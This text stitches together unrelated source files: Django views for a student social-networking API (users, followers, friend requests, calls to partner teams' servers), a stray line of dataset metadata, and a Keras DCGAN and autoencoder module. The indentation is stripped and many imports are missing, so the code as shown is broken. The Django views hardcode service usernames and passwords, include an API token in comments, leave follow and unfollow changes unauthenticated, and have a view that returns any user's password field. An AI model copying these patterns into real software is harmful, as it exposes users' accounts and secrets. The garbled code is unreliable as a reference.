from django.http import HttpResponse, HttpResponseRedirect, HttpResponseForbidden, HttpResponseBadRequest, JsonResponse
from django.contrib.auth import authenticate, login, logout
from django.urls import reverse_lazy
from django.db.models import Q
from django.core.paginator import Paginator
from .serializers import UserSerializer, userFollowSerializer, userPSerializer, friend_request_serializer
from rest_framework import routers
#rest framework imports
from rest_framework.decorators import api_view, permission_classes
from rest_framework.response import Response
from django.views.decorators.csrf import csrf_exempt
from rest_framework.authtoken.models import Token
from rest_framework.permissions import IsAuthenticated
from rest_framework.decorators import authentication_classes
from rest_framework.authentication import TokenAuthentication, get_authorization_header
from rest_framework import authentication, permissions
import base64
import requests
import json
Post_model = apps.get_model('posts', 'Post')
class AccessPermission(permissions.BasePermission):
def has_permission(self, request, view):
auth_header = request.META.get('HTTP_AUTHORIZATION', '')
token_type, _, credentials = auth_header.partition(' ')
expected = base64.b64encode(b'socialdistribution_t05:c404t05').decode()
if token_type == 'Basic' and credentials == expected:
return True
else:
return False
class CustomAuthentication(authentication.BaseAuthentication):
def authenticate(self, request):
auth_header = request.META.get('HTTP_AUTHORIZATION', '')
token_type, _, credentials = auth_header.partition(' ')
expected = base64.b64encode(b'socialcircleauth:cmput404').decode()
if token_type == 'Basic' and credentials == expected:
return (True, None)
else:
return None
def authenticate_header(self, request):
return '{"username" : <username>, "password" : <password>}'
class ManageUserView(APIView):
authentication_classes = [SessionAuthentication, BasicAuthentication]
permission_classes = [IsAuthenticated]
http_method_names = ["get", "post"]
def get(self, request, author_id, format=None):
try:
user = get_object_or_404(User, pk=author_id)
user_profile = get_object_or_404(User_Profile, user=user)
serializer = userPSerializer(user_profile, many=False)
return Response(serializer.data)
except Exception as e:
return JsonResponse({'msg':'There was an error: {}'.format(e)})
def post(self, request, author_id, format=None):
try:
user = get_object_or_404(User, pk=author_id)
user_profile = get_object_or_404(User_Profile, user=user)
#data = JSONParser().parse(request)
serializer = userPSerializer(instance=user_profile, data=request.data)
if serializer.is_valid():
serializer.save()
return JsonResponse(serializer.data)
except Exception as e:
return JsonResponse({'msg':'There was an error {}'.format(e)})
@api_view(['GET'])
def apiOverview(request):
return Response("API BASE POINT", safe=False)
#TODO: ADD PAGINATION WHERE NEEDED
@api_view(['GET'])
@authentication_classes([])
@permission_classes([])
def UserList(request):
user_profiles = User_Profile.objects.all()
page_number = request.GET.get('page', 1)
page_size = request.GET.get('size', 5)
paginator = Paginator(user_profiles, page_size)
page_obj = paginator.get_page(page_number)
serializer = userPSerializer(page_obj, many=True)
return Response({'type': 'authors', 'page':page_number, 'size':page_size , 'items':serializer.data})
@api_view(['GET'])
@authentication_classes([CustomAuthentication])
@permission_classes([AccessPermission])
def userGet(request, User_id):
user = get_object_or_404(User, pk=User_id)
print(user)
print(user.id, User_id)
user_profile = get_object_or_404(User_Profile, user=user)
if request.method == "GET":
serializer = userPSerializer(user_profile, many=False)
return Response(serializer.data)
@api_view(['POST'])
@authentication_classes([TokenAuthentication])
@permission_classes([IsAuthenticated])
def userPost(request, User_id):
user = get_object_or_404(User, pk=User_id)
print(user)
print(user.id, User_id)
user_profile = get_object_or_404(User_Profile, user=user)
if request.method == "POST":
serializer = userPSerializer(instance=user_profile, data=request.data)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
@api_view(['GET'])
@authentication_classes([])
@permission_classes([])
def follow_list(request, User_id):
user = get_object_or_404(User, pk=User_id)
user_profile = get_object_or_404(User_Profile, user=user)
followers_list = UserFollows.objects.filter(object=user_profile)
actor_list = []
for follow in followers_list:
actor_list.append(follow.actor)
serializer = userPSerializer(actor_list, many=True)
return Response({'type': 'follow', 'items': serializer.data})
@api_view(['GET'])
@authentication_classes([CustomAuthentication])
@permission_classes([AccessPermission])
def following_list(request, User_id):
user = get_object_or_404(User, pk=User_id)
user_profile = get_object_or_404(User_Profile, user=user)
followers_list = UserFollows.objects.filter(actor=user_profile)
object_list = []
for followed in followers_list:
object_list.append(followed.object)
serializer = userPSerializer(object_list, many=True)
return Response({'type': 'following', 'items': serializer.data})
@api_view(['GET', 'PUT', 'DELETE'])
@authentication_classes([])
@permission_classes([])
def get_follow(request, User_id, Foreign_id):
if request.method == 'GET':
user = get_object_or_404(User, pk=User_id)
foreign_user = get_object_or_404(User, pk=Foreign_id)
user_profile = get_object_or_404(User_Profile, user=user)
foreign_user_profile = get_object_or_404(User_Profile, user=foreign_user)
if request.method == 'GET':
thing = UserFollows.objects.filter(actor=foreign_user_profile,
object=user_profile).first()
            if thing is not None:
return HttpResponse('True\n')
else:
return HttpResponse('False\n')
#serializer = userFollowSerializer(thing, many=False)
#print('PRINTING DATA:', serializer)
#return Response(serializer.data)
else:
print(request._request)
return follow_crud(request._request, User_id, Foreign_id)
@api_view(['PUT', 'DELETE'])
@authentication_classes([TokenAuthentication])
@permission_classes([IsAuthenticated])
def follow_crud(request, User_id, Foreign_id):
user = get_object_or_404(User, pk=User_id)
foreign_user = get_object_or_404(User, pk=Foreign_id)
user_profile = get_object_or_404(User_Profile, user=user)
foreign_user_profile = get_object_or_404(User_Profile, user=foreign_user)
if request.method == 'PUT':
#TODO: PUT METHOD NEEDS TO BE AUTHENTICATED
#f_request, created = FriendRequest.objects.get_or_create(actor=foreign_user_profile, object=user_profile)
FriendRequest.create_friend_request(foreign_user_profile, user_profile)
UserFollows.create_user_follow(foreign_user_profile, user_profile)
return Response('PUT')
elif request.method == 'DELETE':
print('{} is unfollowing {}'.format(foreign_user_profile.displayName,
user_profile.displayName))
UserFollows.delete_user_follow(foreign_user_profile, user_profile)
return Response('DELETE')
else:
return HttpResponseBadRequest('Bad')
return Response()
@api_view(['GET', 'POST'])
@authentication_classes([])
@permission_classes([])
def get_post_comments(request, User_id, post_id):
user = get_object_or_404(User, pk=User_id)
post = get_object_or_404(Post_model, pk=post_id, author=user)
if request.method == "GET":
comments = Comment.objects.filter(post=post_id)
serializers = CommentSerializer(comments, many=True)
return Response(serializers.data)
elif request.method == "POST":
        return Response()
else:
return HttpResponseBadRequest("Method {} is not allowed".format(
request.method))
    return Response()
def homepage(request):
return HttpResponse("Placeholder homepage")
def placeholder(request, User_id):
#latest_user_list = User.objects.order_by('-id')[:5]
#output = ','.join([str(q.username) for q in latest_user_list])
user = get_object_or_404(User, pk=User_id)
    output = 'User id is: {}, Username is: {}, password is: {}'.format(
user.id, user.username, user.password)
return HttpResponse(output)
def user_post_view(request, User_id):
user = get_object_or_404(User, pk=User_id)
latest_post_list = Post_model.objects.all().filter(author__id=user.id)
print(latest_post_list)
return render(request, 'posts/placeholder.html',
{'latest_post_list': latest_post_list})
def index(request):
#my_dict = {'insert_me': "This line is from users/index.html"}
return render(request, 'users/user_home_page.html')
def create_user_view(request):
#form = Create_user()
form = create_user_form.create_new_user(request.POST)
if request.method == "POST":
#form = Create_user(request.POST)
form = create_user_form.create_new_user(request.POST)
if form.is_valid():
print("OK")
#TODO: CHECK IF THE USER ALREADY EXISTS IN THE DATABASE
new_user = User.objects.create_user(
username=form.cleaned_data['displayName'],
password=form.cleaned_data['password'])
user_prof = User_Profile(user=new_user)
print(user_prof.user, user_prof.type)
print(new_user.id)
user_prof.save()
form.clean()
else:
print("not ok")
return render(request, 'users/create_user.html', {'form': form})
def register(request):
registered_user = False
if request.method == "POST":
user_form = create_user_form.create_new_user(request.POST)
user_profile_form = create_user_form.create_new_user_profile(
request.POST)
if user_form.is_valid() and user_profile_form.is_valid():
user = user_form.save()
user.set_password(<PASSWORD>)
user.save()
profile = user_profile_form.save(commit=False)
profile.user = user
inbox = Inbox(author=user)
inbox.save()
if 'profileImage' in request.FILES:
profile.profileImage = request.FILES['profileImage']
profile.save()
            registered_user = True
return render(request, 'users/login.html')
else:
print('register failed')
print('user form error:' + str(user_form.errors))
print('user profile form error:' + str(user_profile_form.errors))
else:
user_form = create_user_form.create_new_user()
user_profile_form = create_user_form.create_new_user_profile()
return render(
request, 'users/register.html', {
'user_registered': registered_user,
'user_form': user_form,
'profile_form': user_profile_form
})
def login_view(request):
if request.method == 'POST':
username = request.POST['username']
password = request.POST['password']
user = authenticate(username=username, password=password)
if user:
try:
token = Token.objects.get(user_id=user.id)
except Token.DoesNotExist:
token = Token.objects.create(user=user)
if user:
if user.is_active:
login(request, user)
#return HttpResponseRedirect('user_home_page')
return redirect('feed')
else:
print('This user account is not activated yet')
return HttpResponse('This user account is not activated yet')
else:
print('No such username or password in the database')
#HttpResponse('No such username or password in the database')
return render(request, 'users/login_failed.html')
else:
return render(request, 'users/login.html', {})
@login_required
def logout_view(request):
logout(request)
return render(request, 'users/login.html')
@login_required
def confirm_logout_view(request):
return HttpResponse("logout from the user account")
@login_required
def user_home_page_view(request):
    user = User.objects.get(id=request.user.id)
    the_user_profile = User_Profile.objects.get(user=request.user)
    user_profile_image = the_user_profile.profileImage
    user_display_name = the_user_profile.displayName
return render(request,
'users/user_home_page.html',
context={
'insert_display_name': user_display_name,
'user_profile_image': user_profile_image
})
@login_required
def edit_user_profile_view(request):
if request.method == "POST":
user_profile_form = create_user_form.create_new_user_profile(
request.POST)
original_user_profile = User_Profile.objects.get(user=request.user)
if user_profile_form.is_valid():
#profile = user_profile_form.save(commit=False)
#request.user.profile = profile
original_user_profile.displayName = request.POST['displayName']
original_user_profile.bio = request.POST['bio']
original_user_profile.github = request.POST['github']
if 'profileImage' in request.FILES:
original_user_profile.profileImage = request.FILES[
'profileImage']
original_user_profile.save()
else:
print('edit user profile failed')
print('user profile form error:' + str(user_profile_form.errors))
else:
user_profile_form = create_user_form.create_new_user_profile()
return render(request, 'users/edit_user_profile.html',
{'profile_form': user_profile_form})
def advance_home_page_view(request):
return render(request, 'users/advance_home_page.html')
def send_friend_request(request, User_id):
if request.user.is_anonymous:
return HttpResponseForbidden("Please sign in")
user = get_object_or_404(User, pk=User_id)
print(user)
request_profile = User_Profile.objects.get(user=request.user)
#Checks if the object_profile is valid
object_profile = get_object_or_404(User_Profile, user_id=User_id)
#TODO: CHECK IF THE ACTOR IS ALREADY FOLLOWING THE OBJECT
f_request = FriendRequest.create_friend_request(request_profile,
object_profile)
serializer = friend_request_serializer(f_request, many=False)
print(serializer)
print(serializer.data)
return HttpResponseRedirect(reverse('users:request_page'))
#return JsonResponse(serializer.data)
def accept_friend_request(request, User_id):
#User id is from the actor, the person who sent the friend request
#Error checking
if request.user.is_anonymous:
return HttpResponseForbidden("Please sign in")
actor_user_profile = get_object_or_404(User_Profile, user_id=User_id)
object_user_profile = get_object_or_404(User_Profile, user=request.user)
f_request = FriendRequest.objects.filter(actor=actor_user_profile,
object=object_user_profile)
if not f_request.exists():
return HttpResponseBadRequest("Friend request does not exist")
#TODO: ADD THE ACTOR IN USER FOLLOWS
actor_user = get_object_or_404(User, pk=User_id)
UserFollows.objects.get_or_create(actor=actor_user_profile,
object=object_user_profile)
UserFollows.objects.get_or_create(actor=object_user_profile,
object=actor_user_profile)
#TODO: DO SOME ERROR CHECKING AND CHECK IF THE F_REQUEST INSTANCE EXISTS
f_request.delete()
print("{} accepted {}s' friend request".format(
object_user_profile.displayName, actor_user_profile.displayName))
return HttpResponseRedirect('/authors/requests/view-request/{}/'.format(
request.user.id))
def reject_friend_request(request, User_id):
if request.user.is_anonymous:
return HttpResponseForbidden("Please sign in")
actor_user_profile = get_object_or_404(User_Profile, user_id=User_id)
object_user_profile = get_object_or_404(User_Profile, user=request.user)
f_request = FriendRequest.objects.filter(actor=actor_user_profile,
object=object_user_profile)
if not f_request.exists(): #Checks if the friend request exists
return HttpResponseBadRequest("Friend request does not exist")
f_request.delete()
print("{} deleted {}s' friend request".format(
object_user_profile.displayName, actor_user_profile.displayName))
return HttpResponseRedirect('/authors/requests/view-request/{}/'.format(
request.user.id))
def view_friend_requests(request, User_id):
#Makes sure that only the author can see the requests
if request.user.id != User_id:
return HttpResponseForbidden("You are forbidden")
user_profile = get_object_or_404(User_Profile, user_id=User_id)
recieved_requests = FriendRequest.objects.filter(object=user_profile)
sent_requests = FriendRequest.objects.filter(actor=user_profile)
print(recieved_requests, sent_requests)
return render(request, 'users/view_requests.html', {
'recieved_requests': recieved_requests,
'sent_requests': sent_requests
})
def get_t15_authors(url):
ext_request = requests.get(
url,
auth=('connectionsuperuser', '404connection'),
headers={
'Referer': "https://cmput404-socialdist-project.herokuapp.com/"
})
ext_request = ext_request.json()
return ext_request
def view_t15_users(request):
url = "https://unhindled.herokuapp.com/service/authors"
authors = get_t15_authors(url)
list_of_authors = []
for i in authors['items']:
list_of_authors.append(i)
return render(request, 'users/team15users.html',
{'authors': list_of_authors})
def make_external_request(url, auth):
ext_request = requests.get(
url,
auth=auth,
headers={
'Referer': "https://cmput404-socialdist-project.herokuapp.com/"
})
ext_request = ext_request.json()
return ext_request
def view_t3_users(request):
url = "https://social-dis.herokuapp.com/authors/"
auth = ('socialdistribution_t03', '<PASSWORD>')
ext_json = make_external_request(url, auth)
print(ext_json['items'])
return render(request, 'users/t03_users.html',
{'authors': ext_json['items']})
def view_t3_posts(request):
url = "https://social-dis.herokuapp.com/posts/"
auth = ('socialdistribution_t03', '<PASSWORD>')
ext_json = make_external_request(url, auth)
#print(ext_json['items'])
return render(request, 'users/t03_posts.html',
{'post_list': ext_json['items']})
def view_followers(request, User_id):
user = get_object_or_404(User, pk=User_id)
user_profile = get_object_or_404(User_Profile, user=user)
followers_list = UserFollows.objects.filter(object=user_profile)
follows_list = UserFollows.objects.filter(actor=user_profile)
is_user = (request.user.id == User_id)
#friends_list = UserFollows.objects.filter(object_id=user_profile)
for x in followers_list:
print(x.actor.displayName)
return render(
request, 'users/view_followers.html', {
'followers_list': followers_list,
'user': user_profile,
'request': request,
'follows_list': follows_list
})
# This function will make it so that User_id user will stop following
# foreign_id user
def unfollower_user(request, User_id, foreign_id):
if request.user.id != User_id:
return HttpResponseForbidden("Action is not allowed.")
user_profile = fetch_user_profiles(User_id)
foreign_profile = fetch_user_profiles(foreign_id)
UserFollows.delete_user_follow(user_profile, foreign_profile)
return HttpResponseRedirect(reverse( 'users:view_followers',args=[User_id]))
def fetch_user_profiles(user_id):
user = get_object_or_404(User, pk=user_id)
return get_object_or_404(User_Profile, user=user)
def send_request_page(request):
user_profile = get_object_or_404(User_Profile, user_id=request.user.id)
users_list = User_Profile.objects.filter(~Q(user=request.user))
print(users_list)
return render(request, 'users/send_requests.html',
{'users_list': users_list})
def get_user_page(request, User_id):
user = get_object_or_404(User, pk=User_id)
user_profile = get_object_or_404(User_Profile, user_id=User_id)
return render(request, 'users/author_page_json.html', {'user_id': User_id})
@login_required
def display_token(request):
token = Token.objects.get(user=request.user).key
return render(request,
'users/display_token.html',
context={'user_token': token})
#curl -X GET http://127.0.0.1:8000/post/request_post_list -H 'Authorization: Token 8a91340fa2849cdc7e0e7aa07f4b2c0e91f09a3a'
#curl -X GET http://127.0.0.1:8000/authors/send_token -H 'Authorization: Username doge Password <PASSWORD>'
@login_required
def generate_token(request):
user = request.user
new_token = Token.objects.get(user=user)
user.token = new_token
user.save()
return HttpResponseRedirect('user_home_page')
#curl -X GET http://127.0.0.1:8000/post/request_post_list -H 'Authorization: Token 8a91340fa2849cdc7e0e7aa07f4b2c0e91f09a3a'
``` |
{
"source": "2021-FIIT-Bc-projects/DCGAN-Docker",
"score": 2
} |
#### File: gan/src/dcgan_models.py
```python
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, \
Conv2D, \
ReLU, \
LeakyReLU, \
Dropout, \
Flatten, \
Reshape, \
Conv2DTranspose, \
BatchNormalization
from tensorflow.keras.optimizers import Adam
from tensorflow.keras import initializers, optimizers
from os import stat, mkdir, path, listdir, remove
import datetime # testing
import numpy as np
import math
from matplotlib import pyplot as plt
import random
from PIL import Image
from skimage.transform import resize
import csv # for logging
#dataset_path = "/content/ffhq-dataset/thumbnails128x128"
#output_path = "/content/drive/My Drive/gan_files"
class GAN:
def __init__(self, generator, discriminator, height=64, width=64, model_name="dcgan_tanh_x64", output_path="", dataset_size=70000, inputs=None, lr=0.0002):
self.dataset_size = dataset_size
self.batch_size = None
model_directory = path.join(output_path, model_name)
try:
stat(model_directory)
except:
mkdir(model_directory)
mkdir(path.join(model_directory, "saves"))
mkdir(path.join(model_directory, "outputs"))
mkdir(path.join(model_directory, "outputs", "evaluation"))
mkdir(path.join(model_directory, "anim"))
self.height = height
self.width = width
self.model_name = model_name
self.output_path = output_path
discriminator.model.trainable = False
self.model = Sequential()
self.model.add(generator.model)
self.model.add(discriminator.model)
self.model.layers[0]._name = 'Generator'
self.model.layers[1]._name = 'Discriminator'
adam = Adam(learning_rate=lr, beta_1=0.5)
self.model.compile(loss='binary_crossentropy', optimizer=adam)
self.generator = generator
self.discriminator = discriminator
        self.inputs = inputs
def eval_performance(self, losses, init_time,
n_dim, i_epoch, n_epochs, i_batch, n_batches, inputs, n=100, n_plot=10, plot_size=9, disable_plot=False):
# x_real, y_real = self.discriminator.generate_real_samples_random(n, 0, self.dataset_size)
x_real, y_real = self.discriminator.generate_real_samples_random(n, type=self.discriminator.dataset_type)
_, acc_real = self.discriminator.model.evaluate(x_real, y_real, verbose=0)
input_points = random_latent_points(n_dim, n)
x_fake, y_fake = self.generator.generate_fake_samples(input_points, n_dim, n)
_, acc_fake = self.discriminator.model.evaluate(x_fake, y_fake, verbose=0)
batch_id = i_epoch * n_batches + i_batch
timestamp = datetime.datetime.now()
eval_row = [batch_id,
timestamp,
losses[0],
losses[1],
losses[2],
acc_real,
acc_fake,
]
with open(path.join(self.output_path, self.model_name, 'outputs', 'evaluation', 'metrics.csv'), 'a+') as metrics_file:
writer = csv.writer(metrics_file, delimiter=',')
writer.writerow(eval_row)
print(f"[Batch {batch_id}:]\n"
f"Time since start of session: {timestamp - init_time}\n"
f"Discriminator real loss: {losses[0]}\n"
f"Discriminator fake loss: {losses[1]}\n"
f"Gan fitting loss: {losses[2]}\n"
f"Real accuracy: {acc_real}\n"
f"Fake accuracy: {acc_fake}\n"
f"Metrics logged to csv file.")
if i_batch % n_plot == 0:
# n_factor = math.sqrt(n)
fig = generate_and_plot(self.generator, n_dim, inputs, plot_size)
epoch_padding_size = 8 # len(str(n_epochs-1))
batch_padding_size = 8 # len(str(n_batches-1))
filename = path.join(self.output_path, self.model_name, "outputs", f"output_epoch_{str(i_epoch).rjust(epoch_padding_size, '0')}_" \
f"{str(i_batch).rjust(batch_padding_size, '0')}.png")
fig.savefig(filename)
if disable_plot == False:
plt.show(fig)
plt.close(fig)
def train_gan(self, dataset_size,
n_dim=100, start_epoch=0, n_epochs=100, n_batch=128, n_eval=2000, eval_samples=100, n_plot=10,
plot_size=9, type='face', disable_plot=False):
        # update the discriminator with n_batch inputs: half real, half fake
self.batch_size = n_batch
half_batch = n_batch // 2
batches = dataset_size // half_batch
init_time = datetime.datetime.now()
for epoch in range(start_epoch, n_epochs):
            start_n = 0  # position in the dataset for this epoch
for i in range(batches):
print(f"[Epoch {epoch}] Batch {i}/{batches}")
                # input and target for the discriminator
x_real, y_real = self.discriminator.generate_real_samples(start_n, half_batch, type=self.discriminator.dataset_type)
input_points = random_latent_points(n_dim, half_batch)
x_fake, y_fake = self.generator.generate_fake_samples(input_points, n_dim, half_batch)
d_loss_real, _ = self.discriminator.model.train_on_batch(x_real, y_real)
d_loss_fake, _ = self.discriminator.model.train_on_batch(x_fake, y_fake)
                # input and target for the generator
x_gan = random_latent_points(n_dim, n_batch)
y_gan = np.ones((n_batch, 1))
g_loss = self.model.train_on_batch(x_gan, y_gan)
if i % n_eval == 0:
losses = (d_loss_real, d_loss_fake, g_loss)
                    if self.inputs is None:
inputs = random_latent_points(n_dim, plot_size)
else:
inputs = self.inputs
self.eval_performance(losses, init_time,
n_dim, epoch, n_epochs, i, batches, inputs, n=eval_samples, n_plot=n_plot,
plot_size=plot_size, disable_plot=disable_plot)
start_n += half_batch
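# Minimal wiring sketch (illustrative only; assumes FFHQ-style thumbnails are available
# under the dataset path below, which is a placeholder). Shows how Generator,
# Discriminator and GAN are composed and trained with the methods above.
def _example_training_run():
    disc = Discriminator(64, 64, dataset_path="dataset_download/thumbnails128x128")
    gen = Generator(64, 64, n_dim=100)
    fixed_inputs = random_latent_points(100, 9)  # reused at every evaluation for comparable plots
    gan = GAN(gen, disc, height=64, width=64, inputs=fixed_inputs)
    gan.train_gan(dataset_size=1000, n_dim=100, n_epochs=1, n_batch=128, disable_plot=True)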
class Discriminator:
def __init__(self, default_width, default_height, n_filters=128, pixel_depth=3, dataset_path='', dataset_type='face', lr=0.0002):
# edit kernel size, layer sizes, bigger dropouts, default alpha on relu
self.dataset_path = dataset_path
self.dataset_type = dataset_type
self.height = default_height
self.width = default_width
self.pixel_depth = pixel_depth
self.model = Sequential()
        first_layer = Conv2D(  # input np arrays are 3d, but the convolution over them is 2d
filters=n_filters,
kernel_size=(5, 5), # ^^
strides=(2, 2),
padding='same',
input_shape=(self.height, self.width, pixel_depth)
)
first_activation = LeakyReLU(alpha=0.2)
first_dropout = Dropout(0.3)
self.model.add(first_layer)
self.model.add(first_activation)
self.model.add(first_dropout)
current_size = self.height // 2
while current_size > 4:
            new_layer = Conv2D(  # input np arrays are 3d, but the convolution over them is 2d
                filters=n_filters // 2,
kernel_size=(5, 5), # ^^
strides=(2, 2),
padding='same'
)
new_activation = LeakyReLU(alpha=0.2)
new_dropout = Dropout(0.3)
self.model.add(new_layer)
self.model.add(new_activation)
self.model.add(new_dropout)
current_size /= 2
flatten = Flatten()
output_dense = Dense(
            units=1,  # real/fake classification
activation='sigmoid'
)
self.model.add(flatten)
self.model.add(output_dense)
# model.summary()
adam = Adam(learning_rate=lr, beta_1=0.5)
        self.model.compile(loss='binary_crossentropy', optimizer=adam, metrics=['accuracy'])  # metrics needed for evaluation
def generate_real_face_samples(self, i_start, n):
picked_sample_list = list()
for i_image in range(i_start, i_start + n):
chosen_sample = i_image
chosen_folder = chosen_sample - (chosen_sample % 1000)
folder_string = str(chosen_folder)
image_string = str(chosen_sample)
folder_string = folder_string.rjust(5, '0') # padding
image_string = image_string.rjust(5, '0') # padding
full_path = path.join(self.dataset_path, folder_string, image_string + '.png')
with Image.open(full_path) as image:
image_array = np.array(image)
image_array = resize(image_array, (self.height, self.width))
picked_sample_list.append(image_array)
# after loading n samples:
X = np.array(picked_sample_list)
y = np.ones((n, 1))
return X, y
def generate_real_samples(self, i_start, n, type='face'):
loader = None
if type == 'face':
loader = self.generate_real_face_samples
else:
print("Unknown dataset.")
return None
return loader(i_start, n)
def generate_real_face_random(self, n, i_min=0, i_max=70000):
picked_sample_list = list()
for i_image in range(n):
chosen_sample = random.choice(range(i_min, i_max))
chosen_folder = chosen_sample - (chosen_sample % 1000)
folder_string = str(chosen_folder)
image_string = str(chosen_sample)
folder_string = folder_string.rjust(5, '0') # padding
image_string = image_string.rjust(5, '0') # padding
full_path = path.join(self.dataset_path, folder_string, image_string + '.png')
with Image.open(full_path) as image:
image_array = np.array(image)
image_array = resize(image_array, (self.height, self.width))
picked_sample_list.append(image_array)
X = np.array(picked_sample_list)
y = np.ones((n, 1))
return X, y
def generate_real_samples_random(self, n, i_min=0, i_max=70000, type='face'):
loader = None
if type == 'face':
loader = self.generate_real_face_random
else:
print("Unknown dataset.")
return None
return loader(n)
class Generator:
def __init__(self, default_height, default_width, n_dim=100, n_paralell_samples=64, pixel_depth=3, init_size=8):
#changes:
# leakyrelu to default alpha, use_bias=False, added batch norms, kernel size to 5, add initial conv2dtransp
# dense size 128 -> 256, first conv 128, then all 64
self.height = default_height
self.width = default_width
self.model = Sequential()
first_layer = Dense(
units=init_size * init_size * 256,
input_dim=n_dim,
# use_bias=False,
# activation='linear'
)
# first_norm = BatchNormalization()
first_activation = LeakyReLU()
reshape = Reshape((init_size, init_size, 256))
        #init_conv = Conv2DTranspose( # alternative to UpSample2D + Conv2D (upsample, then fill in detail), merged into a single layer
# filters=n_paralell_samples,
# kernel_size=(5, 5),
# strides=(1, 1),
# padding='same',
# use_bias=False
#)
# init_norm = BatchNormalization()
#init_activation = LeakyReLU()
self.model.add(first_layer)
# self.model.add(first_norm)
self.model.add(first_activation)
self.model.add(reshape)
#self.model.add(init_conv)
# self.model.add(init_norm)
#self.model.add(init_activation)
current_size = init_size
while current_size < self.height:
            new_layer = Conv2DTranspose(  # alternative to UpSample2D + Conv2D (upsample, then fill in detail), merged into a single layer
filters=n_paralell_samples,
kernel_size=(4, 4),
strides=(2, 2),
padding='same',
# use_bias=False
)
# new_norm = BatchNormalization()
new_activation = LeakyReLU()
self.model.add(new_layer)
# self.model.add(new_norm)
self.model.add(new_activation)
current_size *= 2
output_layer = Conv2D(
filters=pixel_depth, # rgb info
kernel_size=(3, 3),
            activation='tanh',  # special activation function for rgb output
padding='same',
# use_bias=False
)
self.model.add(output_layer)
def generate_fake_samples(self, x_input, n_dim, n): # [-1,1]
X = self.model.predict(x_input)
y = np.zeros((n, 1))
return X, y
def rgb_to_float(rgb_value):
zero_to_one = rgb_value / 256.0
# normalized = (zero_to_one - 0.5) * 2
return zero_to_one
def float_to_rgb(float_value):
# converted_float = (float_value / 2) + 0.5
rgb_value = (float_value * 256)
rgb_value = np.where(rgb_value > 255, 255, rgb_value)
rgb_value = np.where(rgb_value < 0, 0, rgb_value).astype('uint8')
return rgb_value
def random_latent_points(n_dim, n):
    latent_vectors = np.random.randn(n_dim * n)  # n_dim * n samples from a gaussian distribution
latent_vectors = latent_vectors.reshape(n, n_dim)
return latent_vectors
def generate_and_plot(generator, n_dim, inputs, n):
n_factor = int(math.sqrt(n))
x_plt, _ = generator.generate_fake_samples(inputs, n_dim, n)
px = 1 / plt.rcParams['figure.dpi']
fig = plt.figure(frameon=False, figsize=((n_factor * generator.width) * px, (n_factor * generator.height) * px))
    for i in range(n_factor * n_factor):  # CHANGE SO THAT THE FACTORS ARE USED INSTEAD OF 4, 5
# define subplot
ax = fig.add_subplot(n_factor, n_factor, 1 + i)
ax.axis('off')
ax.imshow(float_to_rgb(x_plt)[i], interpolation='nearest')
plt.tight_layout()
fig.subplots_adjust(wspace=0, hspace=0, left=0, right=1, top=1, bottom=0)
return fig
def latent_transition(pointA, pointB, n_dim=100, n_steps=100):
transition_points = np.empty([n_steps, n_dim])
for i in range(n_steps):
step = (-math.cos(i / n_steps * math.pi) * 0.5 + 0.5) # input value (t) for interp
for dim in range(n_dim):
transition_points[i][dim] = (pointB[dim] - pointA[dim]) * step + pointA[dim] # cosine interpolation
return transition_points
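# Sketch of a latent-space walk using the helpers above (illustrative; expects an
# already trained Generator instance).
def _example_latent_walk(generator, n_dim=100, n_steps=60):
    point_a = random_latent_points(n_dim, 1)[0]
    point_b = random_latent_points(n_dim, 1)[0]
    steps = latent_transition(point_a, point_b, n_dim=n_dim, n_steps=n_steps)
    frames, _ = generator.generate_fake_samples(steps, n_dim, n_steps)
    return [float_to_rgb(frame) for frame in frames]  # list of uint8 images for an animation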
class Encoder:
def __init__(self, default_width, default_height, n_filters=64, pixel_depth=3, dataset_path='', dataset_type='face'):
self.dataset_path = dataset_path
self.dataset_type = dataset_type
self.height = default_height
self.width = default_width
self.model = Sequential()
first_layer = Conv2D(
filters=n_filters,
kernel_size=(4, 4),
strides=(2, 2),
padding='same',
input_shape=(self.height, self.width, pixel_depth),
activation='relu',
)
self.model.add(first_layer)
current_size = self.height // 2
while current_size > 4:
            new_layer = Conv2D(  # input np arrays are 3d, but the convolution over them is 2d
filters=n_filters,
kernel_size=(4, 4), # ^^
strides=(2, 2),
padding='same',
activation='relu',
)
self.model.add(new_layer)
current_size /= 2
final_layer = Conv2D(
filters=256,
kernel_size=(4, 4),
strides=(1, 1),
padding='same',
input_shape=(self.height, self.width, pixel_depth),
activation='relu',
)
self.model.add(final_layer)
flatten = Flatten()
output_dense = Dense(
units=100, # result vector
activation='tanh',
)
self.model.add(flatten)
self.model.add(output_dense)
def generate_real_face_samples(self, i_start, n, dataset_path="dataset_download/thumbnails128x128"):
picked_sample_list = list()
for i_image in range(i_start, i_start + n):
chosen_sample = i_image
chosen_folder = chosen_sample - (chosen_sample % 1000)
folder_string = str(chosen_folder)
image_string = str(chosen_sample)
folder_string = folder_string.rjust(5, '0') # padding
image_string = image_string.rjust(5, '0') # padding
full_path = path.join(self.dataset_path, folder_string, image_string + '.png')
with Image.open(full_path) as image:
image_array = np.array(image)
image_array = resize(image_array, (self.height, self.width))
picked_sample_list.append(image_array)
# after loading n samples:
X = np.array(picked_sample_list)
y = np.ones((n, 1))
return X, y
class FMAE:
def __init__(self, encoder, generator, height, width, lr=0.001):
self.height = height
self.width = width
generator.model.trainable = False
self.model = Sequential()
self.model.add(encoder.model)
self.model.add(generator.model)
self.model.layers[0]._name = 'Encoder'
self.model.layers[1]._name = 'Generator'
adam = Adam(learning_rate=lr, beta_1=0.5)
self.model.compile(loss='binary_crossentropy', optimizer=adam, metrics='accuracy')
self.encoder = encoder
self.generator = generator
def train_fmae(self, input_image, n_steps):
init_time = datetime.datetime.now()
for epoch in range(0, n_steps):
if epoch % 100 == 0:
print("Epoch", epoch)
decoded_image = self.model.predict(input_image)
fig = plt.imshow(decoded_image[0], interpolation='nearest')
plt.show(fig)
plt.close()
self.model.fit(input_image, input_image, verbose=0)
def train_fmae_on_dataset(self, input_image, n_epochs, dataset_size=70000, batch_size=100, n_eval=100, plot_size=10, disable_plot=False):
init_time = datetime.datetime.now()
n_batches = dataset_size // batch_size
for epoch in range(0, n_epochs):
start_n = 0
print("Epoch", epoch)
for batch in range(0, n_batches):
samples, _ = self.encoder.generate_real_face_samples(start_n, batch_size, dataset_path="dataset_download/thumbnails128x128")
#inputs = random_latent_points(100, batch_size)
#samples_, _ = self.generator.generate_fake_samples(inputs, 100, batch_size)
self.model.fit(samples, samples, verbose=0)
if batch % n_eval == 0:
print("Batch", batch)
